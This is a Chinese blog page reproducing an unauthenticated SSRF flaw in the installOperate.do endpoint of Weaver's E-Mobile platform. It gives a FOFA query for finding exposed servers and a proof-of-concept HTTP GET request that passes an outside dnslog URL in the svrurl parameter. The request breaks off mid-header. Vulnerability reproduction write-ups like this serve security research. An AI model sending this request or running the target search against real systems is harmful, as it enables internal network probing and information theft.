热门标签
热门文章
- 1使用Kotlin高效地开发Android App(五)完结篇_kotlin开发app
- 2angular2项目本地部署_llama2本地部署
- 3高性价比模型 TSM,用 2D 的成本达到 3D 的效果_tsm模型的具体计算量
- 4AI绘图(7)stable diffusion 绘图 局部重绘_controlnet candy
- 5ROS之命名空间_ros命名空间
- 62024上海(国际)智慧氧舱暨生物细胞博览会
- 7DevOps 安全_安全deops
- 8Gigapixel AI 安装和使用教程_topaz gigapixel ai
- 9ThreadLocal之强、弱、软、虚引用_threadlocal 软引用
- 10为什么需要python?它在人工智能与机器学习的优势是什么?_python在机器学习人工智能的最主要作用
当前位置: article > 正文
泛微E-Mobile installOperate.do SSRF漏洞复现_泛微e-mobile移动管理平台installoperate.do存在ssrf漏洞
作者:我家小花儿 | 2024-08-18 07:26:30
赞
踩
泛微e-mobile移动管理平台installoperate.do存在ssrf漏洞
0x01 产品简介
泛微e-Mobile移动管理平台是一款由泛微软件开发的企业移动办公解决方案。它提供了一系列功能和工具,使企业员工能够通过移动设备随时随地进行办公和协作。
0x02 漏洞概述
泛微E-Mobile installOperate.do 接口处存在服务器请求伪造漏洞,未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口,获取服务的banner信息,窥探网络结构,甚至对内网或本地运行的应用程序发起攻击,获取服务器内部敏感配置,造成信息泄露。
0x03 复现环境
FOFA:header="EMobileServer"
0x04 漏洞复现
PoC
- GET /install/installOperate.do?svrurl=http://dnslog.cn HTTP/1.1
- Host:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Accept-Language: zh-CN,zh;q
推荐阅读
相关标签
